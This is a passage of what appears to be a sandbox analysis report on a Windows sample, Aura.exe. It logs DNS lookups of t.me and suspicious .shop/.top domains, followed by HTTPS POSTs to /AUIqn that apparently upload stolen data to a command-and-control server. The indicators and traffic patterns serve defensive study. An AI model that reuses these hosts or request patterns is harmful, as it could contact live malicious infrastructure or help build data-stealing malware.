Mar 12, 2025 21:42:39.048064947 CET	49734	443	192.168.2.4	104.21.48.1
Mar 12, 2025 21:42:39.048070908 CET	443	49734	104.21.48.1	192.168.2.4
Mar 12, 2025 21:42:55.532258034 CET	57852	53	192.168.2.4	162.159.36.2
Mar 12, 2025 21:42:55.537055016 CET	53	57852	162.159.36.2	192.168.2.4
Mar 12, 2025 21:42:55.537131071 CET	57852	53	192.168.2.4	162.159.36.2
Mar 12, 2025 21:42:55.541856050 CET	53	57852	162.159.36.2	192.168.2.4
Mar 12, 2025 21:42:56.012758970 CET	57852	53	192.168.2.4	162.159.36.2
Mar 12, 2025 21:42:56.017623901 CET	53	57852	162.159.36.2	192.168.2.4
Mar 12, 2025 21:42:56.017740965 CET	57852	53	192.168.2.4	162.159.36.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 12, 2025 21:42:12.357028008 CET	63528	53	192.168.2.4	1.1.1.1
Mar 12, 2025 21:42:12.363748074 CET	53	63528	1.1.1.1	192.168.2.4
Mar 12, 2025 21:42:14.877670050 CET	65000	53	192.168.2.4	1.1.1.1
Mar 12, 2025 21:42:14.891412020 CET	53	65000	1.1.1.1	192.168.2.4
Mar 12, 2025 21:42:36.275547981 CET	50654	53	192.168.2.4	1.1.1.1
Mar 12, 2025 21:42:36.288086891 CET	53	50654	1.1.1.1	192.168.2.4
Mar 12, 2025 21:42:36.289160967 CET	57123	53	192.168.2.4	1.1.1.1
Mar 12, 2025 21:42:36.572211981 CET	53	57123	1.1.1.1	192.168.2.4
Mar 12, 2025 21:42:55.531548977 CET	53	50107	162.159.36.2	192.168.2.4
Mar 12, 2025 21:42:56.040522099 CET	53	63763	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 12, 2025 21:42:12.357028008 CET	192.168.2.4	1.1.1.1	0xd5ce	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Mar 12, 2025 21:42:14.877670050 CET	192.168.2.4	1.1.1.1	0xa21d	Standard query (0)	menuedgarli.shop	A (IP address)	IN (0x0001)	false
Mar 12, 2025 21:42:36.275547981 CET	192.168.2.4	1.1.1.1	0xbe16	Standard query (0)	featureccus.shop	A (IP address)	IN (0x0001)	false
Mar 12, 2025 21:42:36.289160967 CET	192.168.2.4	1.1.1.1	0xacdc	Standard query (0)	mrodularmall.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 12, 2025 21:42:12.363748074 CET	1.1.1.1	192.168.2.4	0xd5ce	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Mar 12, 2025 21:42:14.891412020 CET	1.1.1.1	192.168.2.4	0xa21d	No error (0)	menuedgarli.shop		104.21.16.1	A (IP address)	IN (0x0001)	false
Mar 12, 2025 21:42:14.891412020 CET	1.1.1.1	192.168.2.4	0xa21d	No error (0)	menuedgarli.shop		104.21.48.1	A (IP address)	IN (0x0001)	false
Mar 12, 2025 21:42:14.891412020 CET	1.1.1.1	192.168.2.4	0xa21d	No error (0)	menuedgarli.shop		104.21.80.1	A (IP address)	IN (0x0001)	false
Mar 12, 2025 21:42:14.891412020 CET	1.1.1.1	192.168.2.4	0xa21d	No error (0)	menuedgarli.shop		104.21.96.1	A (IP address)	IN (0x0001)	false
Mar 12, 2025 21:42:14.891412020 CET	1.1.1.1	192.168.2.4	0xa21d	No error (0)	menuedgarli.shop		104.21.64.1	A (IP address)	IN (0x0001)	false
Mar 12, 2025 21:42:14.891412020 CET	1.1.1.1	192.168.2.4	0xa21d	No error (0)	menuedgarli.shop		104.21.112.1	A (IP address)	IN (0x0001)	false
Mar 12, 2025 21:42:14.891412020 CET	1.1.1.1	192.168.2.4	0xa21d	No error (0)	menuedgarli.shop		104.21.32.1	A (IP address)	IN (0x0001)	false
Mar 12, 2025 21:42:36.288086891 CET	1.1.1.1	192.168.2.4	0xbe16	Name error (3)	featureccus.shop	none	none	A (IP address)	IN (0x0001)	false
Mar 12, 2025 21:42:36.572211981 CET	1.1.1.1	192.168.2.4	0xacdc	No error (0)	mrodularmall.top		104.21.48.1	A (IP address)	IN (0x0001)	false
Mar 12, 2025 21:42:36.572211981 CET	1.1.1.1	192.168.2.4	0xacdc	No error (0)	mrodularmall.top		104.21.64.1	A (IP address)	IN (0x0001)	false
Mar 12, 2025 21:42:36.572211981 CET	1.1.1.1	192.168.2.4	0xacdc	No error (0)	mrodularmall.top		104.21.32.1	A (IP address)	IN (0x0001)	false
Mar 12, 2025 21:42:36.572211981 CET	1.1.1.1	192.168.2.4	0xacdc	No error (0)	mrodularmall.top		104.21.96.1	A (IP address)	IN (0x0001)	false
Mar 12, 2025 21:42:36.572211981 CET	1.1.1.1	192.168.2.4	0xacdc	No error (0)	mrodularmall.top		104.21.80.1	A (IP address)	IN (0x0001)	false
Mar 12, 2025 21:42:36.572211981 CET	1.1.1.1	192.168.2.4	0xacdc	No error (0)	mrodularmall.top		104.21.16.1	A (IP address)	IN (0x0001)	false
Mar 12, 2025 21:42:36.572211981 CET	1.1.1.1	192.168.2.4	0xacdc	No error (0)	mrodularmall.top		104.21.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

menuedgarli.shop

mrodularmall.top

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49712	149.154.167.99	443	7880	C:\Users\user\Desktop\Aura.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-12 20:42:14 UTC	61	OUT	GET /asdawfq HTTP/1.1 Connection: Keep-Alive Host: t.me
2025-03-12 20:42:14 UTC	512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 12 Mar 2025 20:42:14 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12329 Connection: close Set-Cookie: stel_ssid=1d8e991a19232cb569_10184960759122643432; expires=Thu, 13 Mar 2025 20:42:14 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2025-03-12 20:42:14 UTC	12329	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 73 64 61 77 66 71 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @asdawfq</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49717	104.21.16.1	443	7880	C:\Users\user\Desktop\Aura.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-12 20:42:17 UTC	266	OUT	POST /AUIqn HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 65 Host: menuedgarli.shop
2025-03-12 20:42:17 UTC	65	OUT	Data Raw: 75 69 64 3d 66 34 30 63 33 66 66 39 36 32 64 63 64 62 34 66 36 62 63 36 38 31 30 62 33 36 65 32 66 36 66 65 39 62 64 38 32 62 37 34 66 61 37 66 36 66 66 61 62 30 62 61 63 66 37 65 26 63 69 64 3d Data Ascii: uid=f40c3ff962dcdb4f6bc6810b36e2f6fe9bd82b74fa7f6ffab0bacf7e&cid=
2025-03-12 20:42:18 UTC	786	IN	HTTP/1.1 200 OK Date: Wed, 12 Mar 2025 20:42:18 GMT Content-Type: application/octet-stream Content-Length: 14134 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mbPDKIG%2Frdha%2FJTosESV8u68YFwmyX52kDIyu0AZpnRzZ2m%2FMjpHHUVuM1xLhkUnyFJruBZ1F5xgp5uqFYBEb4g7DSAlgpOOeadRTzS%2B46Lia9fV8JCG%2BLB0QUqQU9ibpeZA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91f61e07a844adf4-JAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14102&min_rtt=13056&rtt_var=6988&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=967&delivery_rate=135156&cwnd=251&unsent_bytes=0&cid=35b1654d7e917ed8&ts=818&x=0"
2025-03-12 20:42:18 UTC	1369	IN	Data Raw: 4d 69 48 e8 6d 09 b0 92 82 51 fb 34 0a 01 cb c4 44 bc c3 93 98 9c 74 a4 02 d2 87 ec a8 2c dd fe 1a 4e 17 78 70 f9 ad bc 66 1d 0b c1 98 fa 9e 61 d1 eb 13 41 75 60 4c 02 57 4e 91 92 f5 cd 5c c7 f5 ae 0e 4f 3e d8 ca d7 ed e1 2e 69 8a bc 0f c5 cb b0 b8 49 6a 24 1a 7c 7c db 05 42 b8 e8 d1 9c c9 02 2a 9d 43 95 69 39 ec 0a b9 a2 24 13 f5 0b 14 89 72 f2 30 3f 59 e7 a7 88 c5 ea 32 93 df 50 32 a2 dc de be 04 24 a0 1e 53 5a bf 30 3e 8e 8f 5d 93 3f c8 0a 50 4f 49 61 e3 32 88 2c 31 2d d1 07 a5 34 6e c5 88 a1 90 39 bd a0 c2 42 46 d5 68 59 fd 85 9a 44 be 5c 63 a7 b5 53 ab 78 59 d3 c8 1b c4 c7 20 c3 2b 78 25 dd 02 1a 20 0a e8 82 64 ad a9 ef 65 d3 7a 86 d0 03 09 a5 36 c9 d8 9a b0 3e ef 81 fa ee e8 d3 42 30 7a 68 5c 27 51 71 ec 0d e0 20 91 87 70 e6 36 31 05 db ec 03 a3 eb Data Ascii: MiHmQ4Dt,NxpfaAu`LWN\O>.iIj$\|\|B*Ci9$r0?Y2P2$SZ0>]?POIa2,1-4n9BFhYD\cSxY +x% dez6>B0zh\'Qq p61
2025-03-12 20:42:18 UTC	1369	IN	Data Raw: 7f 08 a5 17 14 c7 f8 b8 80 85 d6 67 3c fa e3 22 26 b6 e2 d9 2e f0 6f 40 bd 75 f1 d9 0f 12 b6 c5 e2 e3 cf ce dc 29 43 4c b9 6a 91 31 12 03 d0 3b 9d 00 af e0 eb ff 12 df 57 0f fe 06 80 aa 39 52 1f eb 1d d4 9e 5d 64 1e 34 ee 02 13 e3 55 93 53 3f a2 ac f7 71 ba 51 ab d0 90 4e da 4d b9 de 86 4c d7 f2 4b ed c7 3d 21 05 27 51 eb b2 8f 16 dd d1 aa 42 3a b9 af e2 12 db 0a 64 62 9c 46 3d 77 5f 80 38 99 e2 bc b7 57 8c cb e9 76 01 8e c9 e8 bf 7d c0 5a 09 c8 94 9a a2 a9 8d 64 8e 4a 83 45 a2 71 3c 60 7c 66 64 5a 2c b3 54 44 69 a0 4f 77 f8 ea c2 a7 e8 78 8a 62 54 a8 78 7f ed fb 3c c0 9d 66 95 d6 a7 e9 b9 83 40 61 66 03 d1 e8 08 57 6d f1 92 64 07 3a 86 af 62 90 2e 3e 6c 3d 8b 57 4c 61 f9 a2 87 50 85 5d 75 a2 ec 12 62 27 23 1a 6a 74 d7 89 6d 6d df 26 42 22 22 6d 0f 4e dc Data Ascii: g<"&.o@u)CLj1;W9R]d4US?qQNMLK=!'QB:dbF=w_8Wv}ZdJEq<`\|fdZ,TDiOwxbTx<f@afWmd:b.>l=WLaP]ub'#jtmm&B""mN
2025-03-12 20:42:18 UTC	1369	IN	Data Raw: c5 0d dc 16 0e ad 8e 99 0e 8a 11 b6 41 d5 64 4e c1 90 2c ff 3a 96 a8 f4 bd 86 d0 d0 6d 98 af 9b 2e e3 4d 0b 08 93 5c 1f 82 3b fb e8 84 74 50 70 82 24 19 88 8b dc ec d7 98 09 07 d6 7d 88 29 85 c4 cb f2 43 af 02 82 1d 87 76 df 13 03 e7 13 fa d7 47 50 27 ad 18 91 03 ab 92 10 2a 50 dc b4 7c a1 9b d8 93 50 51 53 34 6a a2 92 f0 03 21 ba 64 e0 88 42 61 1c f7 0e 7a e3 af e4 a6 56 58 48 a8 13 f9 10 4a ad cb 0a dd e1 96 9e 55 31 06 b1 95 c4 37 f4 11 db b9 08 06 da 27 c1 a4 2f cb 80 9d a8 f2 02 6a cb a7 c6 89 7e 1d de 86 0f 9f e4 bc a6 e9 9f a0 9a 8a 69 e6 fb f9 9f a8 e0 39 65 34 5b 75 a4 e5 99 e6 a4 aa 82 e1 63 80 ca 8e 5d 2b 6a fb 5f 95 db 53 50 cf bd ba 7b 9b 0a 14 cd dc 90 53 1b 16 bf 19 88 4c 85 27 74 47 d0 56 e4 05 2b 2e c0 90 c3 84 72 6a 77 b7 46 3c d0 ed 50 Data Ascii: AdN,:m.M\;tPp$})CvGP'*P\|PQS4j!dBazVXHJU17'/j~i9e4[uc]+j_SP{SL'tGV+.rjwF<P
2025-03-12 20:42:18 UTC	1369	IN	Data Raw: ba f7 ea 29 ca c3 66 56 9e 5d c5 55 81 6a d9 47 ed 2f 45 ed 2c 7d 27 60 9d 21 09 35 f2 c0 31 c4 ba d8 a0 f7 a5 18 e8 96 b5 22 8d 15 9e 74 d2 6a 30 ef 07 f0 d6 0d 80 7a fa 6f 05 76 ce 95 02 a6 56 f0 20 09 9a d9 34 96 c8 d7 10 f7 91 b1 21 30 17 63 2a e6 5f cf 48 19 b6 f1 a5 3a ef ae 6e 57 85 d5 c1 5d 2f 5f 67 7c 1c be 42 72 17 f9 5e 1d d2 5f e6 42 68 2a da 78 9d 3c 6d 59 7d 97 bf 85 d6 bc 0b cd 2b b9 bf 6a 43 e6 29 c4 d1 c9 a1 74 1c 8e 7c 27 48 54 b2 1e 3e 85 ac ef 5d 12 b3 4e 61 0b 24 72 09 12 71 39 44 86 30 96 3c 40 8e 68 27 88 ca 9f 38 39 08 f1 9d ef aa fd 90 19 e2 83 94 46 b3 08 87 8f 0e 2d f3 bc 78 8d ac 40 57 df 84 24 81 41 3c e5 c2 d2 b5 4d c7 aa 85 01 1a 84 b9 f4 c7 22 0f ce 16 43 bd 90 3a 98 62 8e dd 62 bd e1 b3 0b c4 d6 a1 45 22 6b ad 5d a2 31 7e Data Ascii: )fV]UjG/E,}'`!51"tj0zovV 4!0c_H:nW]/_g\|Br^_Bhx<mY}+jC)t\|'HT>]Na$rq9D0<@h'89F-x@W$A<M"C:bbE"k]1~
2025-03-12 20:42:18 UTC	1369	IN	Data Raw: 07 07 31 9e c9 26 79 3e 84 bb dc 24 5c 51 24 3c 03 50 d9 6e c3 3b 46 7c 9b cf 0f ec 13 80 ef d0 0b 6e 60 66 05 00 1d 17 4a 2f 89 ac 8b b9 a9 4a 0a e1 dd 13 4d 02 27 86 77 93 c5 56 24 7d bd 7f 9b d9 8a b7 9c 9a 50 ed 0e 75 45 a0 3f 53 4a f0 11 b1 9c 6c 0e 1a 67 72 30 f6 c5 67 c2 2f 18 d3 6f d8 e1 a4 ff 4f 4d e2 e0 c4 b5 d4 f8 e5 e3 46 d3 6b 5d 74 40 92 d4 a4 00 17 4c 3d 83 60 87 8d 21 7f 60 0c 4e 78 f3 78 c7 c1 94 c8 d4 dd 38 48 04 05 60 8a 92 4e 92 4e 85 0c b3 f6 33 6b 5a 49 a1 6b df 70 f9 3f be 66 b4 e8 61 91 20 dc 59 79 6c ab 73 4f bb 41 ed 51 20 b7 7f 0a b6 e8 e9 c0 ec 74 55 ee 49 e3 f9 9c d8 3f 5f 44 86 0e 82 dd 9c 99 a0 d4 5c d2 e1 33 e5 7b a5 d5 3a 28 8a d9 33 fe 1d 6e ff 3b 17 6b b3 9e e9 fb 3f 22 7c 0a 6a 8f de bb 68 55 22 ca 41 61 9d 79 03 23 99 Data Ascii: 1&y>$\Q$<Pn;F\|n`fJ/JM'wV$}PuE?SJlgr0g/oOMFk]t@L=`!`Nxx8H`NN3kZIkp?fa YylsOAQ tUI?_D\3{:(3n;k?"\|jhU"Aay#
2025-03-12 20:42:18 UTC	1369	IN	Data Raw: 6e e2 51 b8 da 36 30 83 63 ff 45 55 f2 70 26 03 fd 38 d7 a3 16 cc b2 39 4b 13 4e 91 79 54 15 de fc 2d 84 a0 37 df d7 d8 59 e4 c1 51 db 98 b8 4b 5f 84 7e ee c1 80 14 f8 45 c5 6d 17 24 7b 38 6d 37 51 e3 a2 2d 4e b1 d0 39 7f d2 6b ce 0c ba b8 c8 ab 48 05 21 c1 70 ec 00 aa 8a fd ba ec e3 e3 ec e0 47 46 59 71 78 b3 05 9a 12 5d 51 b1 a8 c8 ad 42 cb e2 ee e8 d2 3c 7f 82 9f 5d 3a 08 e6 91 5e bd fc ac 66 01 18 24 05 5c 0b 90 e8 06 05 0f ac 7d 80 4a 22 c3 17 45 f4 69 58 e4 59 70 1b 3f d2 ac ab f4 13 8d 91 17 94 db 8f fb 85 9d 36 a6 a8 e0 71 e2 9d 32 62 01 b1 cd 0c 2f 97 78 b7 1e e4 18 ff de 3a f0 3d a1 29 18 ff 70 47 6f 38 d9 6e 6e 9c a9 68 78 d4 b7 73 64 94 b5 93 1d 06 58 76 70 07 72 cf 8e 42 80 77 e2 19 46 47 37 48 c3 5f 15 db b9 d8 51 01 29 7d a9 3c e4 08 2d e9 Data Ascii: nQ60cEUp&89KNyT-7YQK_~Em${8m7Q-N9kH!pGFYqx]QB<]:^f$\}J"EiXYp?6q2b/x:=)pGo8nnhxsdXvprBwFG7H_Q)}<-
2025-03-12 20:42:18 UTC	1369	IN	Data Raw: 1b c5 8d 8d 15 77 36 b2 9c ea f2 30 ad 40 ae e2 e7 eb 1d d7 ae 25 ea dc 67 0f c0 4c 5a 8c 78 a8 be 6d cf f1 2c 1f b9 6b 18 53 e7 54 69 63 bd ed a5 b3 3d d6 2d 8a 11 3b 41 f6 3f 18 b0 32 38 61 0e 42 e7 93 bb 64 0a f8 97 b8 ca 46 dd 02 cd ef 26 ad e4 c7 62 e3 b8 52 a3 54 af ff c1 8e 09 98 00 41 5b 12 41 1e 36 c4 05 6c 12 c3 3b 2f 98 b5 87 d5 37 b8 05 67 4f 90 c4 7a ec 8a b7 6a ce ad bb 9c a5 e8 50 03 2a 0c 31 79 b3 50 8a 60 e9 2e 36 c3 90 45 11 68 6b 98 e1 8f 0d 9c 13 47 ad d3 ca 14 b4 5c 8e f9 2c 60 90 0e 5e 7b 48 a8 46 4b a5 2f d2 02 2d 38 11 0d a0 93 66 6b 03 96 2c a5 ed 5b 98 ae 6f 6a 13 e4 a8 c4 24 e0 46 29 1d 48 55 07 5f b7 c9 48 bf 96 0d 31 fa fc e4 26 25 f2 dd f8 92 a1 82 92 7f 4c fb 58 91 70 8a 7b d0 64 d3 a0 bf 08 81 ec 5b 7a 15 21 8a b4 be 0d f6 Data Ascii: w60@%gLZxm,kSTic=-;A?28aBdF&bRTA[A6l;/7gOzjP*1yP`.6EhkG\,`^{HFK/-8fk,[oj$F)HU_H1&%LXp{d[z!
2025-03-12 20:42:18 UTC	1369	IN	Data Raw: a3 3d d1 7b de 42 04 5e 3c 36 bb 9c 36 04 7c 3f ab 84 f7 19 76 ea 2f 51 49 84 e7 47 65 bf 09 43 1f 4b eb 06 0a 91 51 7d 0f a2 72 1c 57 ef 10 7f b6 9b 5f 30 0a 3e bb d9 58 87 62 1a 32 c1 76 9e 65 c7 4a 08 1a 87 36 7e 2c 3d 9a f8 d2 19 cb b4 46 18 08 c7 2e 4b 1d 62 8f a7 cf 94 25 5e 95 d7 72 0d 1e da b5 ea d2 ef 3d 1a a3 0f 9f 31 3d db a7 c9 d8 22 90 b3 cc da 5b 71 1d d2 ae 95 89 bd 9b af f0 b8 3b 82 6f 23 7b ae 00 df fd 9c fd 89 15 ec 44 c4 cd 25 23 86 e4 0a fe a0 66 f2 38 41 0a 70 14 2a 75 65 bf 46 35 59 bb 07 9b fc ca a8 aa 5a 24 4e 82 3b ca 55 1c 2d 8c 8e 13 69 01 1c 8a 5b b4 0c 90 42 60 f0 b8 fb 49 0f 91 a8 6f 11 3f 81 4c eb 59 c4 06 05 35 48 87 63 1c 21 dc da 6c 2a ce ca a6 57 ce 3c ad fc 25 f3 1f 92 38 c3 01 ed 90 8c 5a 1f 19 51 32 5d ef d6 0b 1f ae Data Ascii: ={B^<66\|?v/QIGeCKQ}rW_0>Xb2veJ6~,=F.Kb%^r=1="[q;o#{D%#f8ApueF5YZ$N;U-i[B`Io?LY5Hc!lW<%8ZQ2]
2025-03-12 20:42:18 UTC	1369	IN	Data Raw: bf 28 1a 1f 5b ab 2d 06 35 8d f5 ce e5 eb fc 1d 41 0b c0 71 38 8f bf d7 69 d9 69 bd 84 3b 2d 09 fa a3 60 9b af 1e 0e 44 79 26 be 92 e4 32 9f fb 53 aa 86 3b 4b 21 c1 a2 11 26 23 37 c2 77 67 57 c5 d6 f9 2c 2d 8e 92 ba 87 49 c6 db 03 68 98 44 e3 01 39 4f cd a1 1d 1b b9 2b 49 4d ca d0 c1 93 7d 4f f3 3c 05 6a 85 71 ac 19 41 f6 97 f5 69 9c 6b 40 47 db a6 da 4d f3 91 92 81 bd cc c2 00 1c d6 b3 4f d1 4a a3 4f b6 16 d5 48 7f f1 f3 83 ac bb d9 8f 5d 5a cb 2f 5d 8a c1 0a 90 08 c6 28 a7 d4 d6 ae 41 44 f4 09 03 1d d7 86 6e 36 ef a7 e3 69 9b 58 07 bc 2d 8b aa 6f 81 13 df 7e ab 81 e7 7a 8e 02 09 73 5a 9a fa 62 3b 5a 7f af 56 ec c9 9a 4b ae f1 b4 9d d7 5b 8c 8b e8 80 f3 d1 f7 0d 89 86 bc 9f 43 5b 52 4c ce 1a 78 9b a6 3e 45 13 03 08 90 3d 5d 23 7f bb bc 97 76 ee 06 7b a8 Data Ascii: ([-5Aq8ii;-`Dy&2S;K!&#7wgW,-IhD9O+IM}O<jqAik@GMOJOH]Z/](ADn6iX-o~zsZb;ZVK[C[RLx>E=]#v{

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49725	104.21.16.1	443	7880	C:\Users\user\Desktop\Aura.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-12 20:42:21 UTC	284	OUT	POST /AUIqn HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=mq2i7necmw1qJv68Ya User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19635 Host: menuedgarli.shop
2025-03-12 20:42:21 UTC	15331	OUT	Data Raw: 2d 2d 6d 71 32 69 37 6e 65 63 6d 77 31 71 4a 76 36 38 59 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 66 34 30 63 33 66 66 39 36 32 64 63 64 62 34 66 36 62 63 36 38 31 30 62 33 36 65 32 66 36 66 65 39 62 64 38 32 62 37 34 66 61 37 66 36 66 66 61 62 30 62 61 63 66 37 65 0d 0a 2d 2d 6d 71 32 69 37 6e 65 63 6d 77 31 71 4a 76 36 38 59 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 6d 71 32 69 37 6e 65 63 6d 77 31 71 4a 76 36 38 59 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 Data Ascii: --mq2i7necmw1qJv68YaContent-Disposition: form-data; name="uid"f40c3ff962dcdb4f6bc6810b36e2f6fe9bd82b74fa7f6ffab0bacf7e--mq2i7necmw1qJv68YaContent-Disposition: form-data; name="pid"2--mq2i7necmw1qJv68YaContent-Disposition: form-data; name
2025-03-12 20:42:21 UTC	4304	OUT	Data Raw: 37 ba be 74 76 3c df 66 4b 3b fd b0 68 b8 c1 f7 b5 97 aa a4 2b 27 ad 17 20 63 b6 79 3c f1 d0 a9 11 fe a5 a3 91 7a a3 18 f4 3f 77 ea 64 da 25 e1 36 37 80 83 16 80 74 b9 42 68 31 9a 01 fd 04 10 e5 a4 87 8e 25 0e d0 ab 29 18 0e 1e de 6a 8f 3b 69 a5 98 ca 8e f3 46 3d b9 a8 b6 a8 96 fd 41 bf 81 60 de 8a 27 a3 62 ee 56 fa 79 07 08 cc 61 b7 2e a0 05 40 21 01 44 e0 26 db d1 4b d2 7d 8a 8d a7 9f da 61 6d 69 f3 38 d3 66 79 7b 3f e6 cf 82 5a ea 3f 03 ff ee 60 e4 e6 1b 76 88 99 de 22 58 5c 9a a4 80 58 be d8 55 57 df 27 7f 28 81 eb d4 98 b5 ac 52 50 0d da f3 a5 27 7c 0c c8 8a 98 cd b3 fb 7e 8b 62 5a 7f 37 59 e8 53 20 68 25 60 f0 13 41 64 8a a6 50 5d 60 4d 05 75 22 79 b5 6c 06 8f b0 10 be 88 4d e0 d3 21 d7 5a 41 55 1e d0 2f 0e 8a f6 cb ca 3a d2 b6 af f5 08 3a a5 20 3f Data Ascii: 7tv<fK;h+' cy<z?wd%67tBh1%)j;iF=A`'bVya.@!D&K}ami8fy{?Z?`v"X\XUW'(RP'\|~bZ7YS h%`AdP]`Mu"ylM!ZAU/:: ?
2025-03-12 20:42:22 UTC	816	IN	HTTP/1.1 200 OK Date: Wed, 12 Mar 2025 20:42:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Aei9XBQqNufc%2Bw4S4h6HkCx%2FfQTUAXoFxIA6yvIuU2kt2DdyobT3T0UCwPr4o3A28zNdTLQg1JY%2FVTTaYkRJ1Y0SKkK6mjGQ4G1AgaNc2n3wv8jGqjx%2BBsr6tKFdkTTYS9wX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91f61e1ccbb54d9a-JAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14032&min_rtt=12842&rtt_var=7196&sent=16&recv=21&lost=0&retrans=0&sent_bytes=2838&recv_bytes=20599&delivery_rate=129488&cwnd=251&unsent_bytes=0&cid=f578537f31167af1&ts=911&x=0"
2025-03-12 20:42:22 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 31 38 32 2e 35 30 2e 31 30 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 73.182.50.10"}}
2025-03-12 20:42:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49727	104.21.16.1	443	7880	C:\Users\user\Desktop\Aura.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-12 20:42:23 UTC	274	OUT	POST /AUIqn HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=9nPgp61TG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8747 Host: menuedgarli.shop
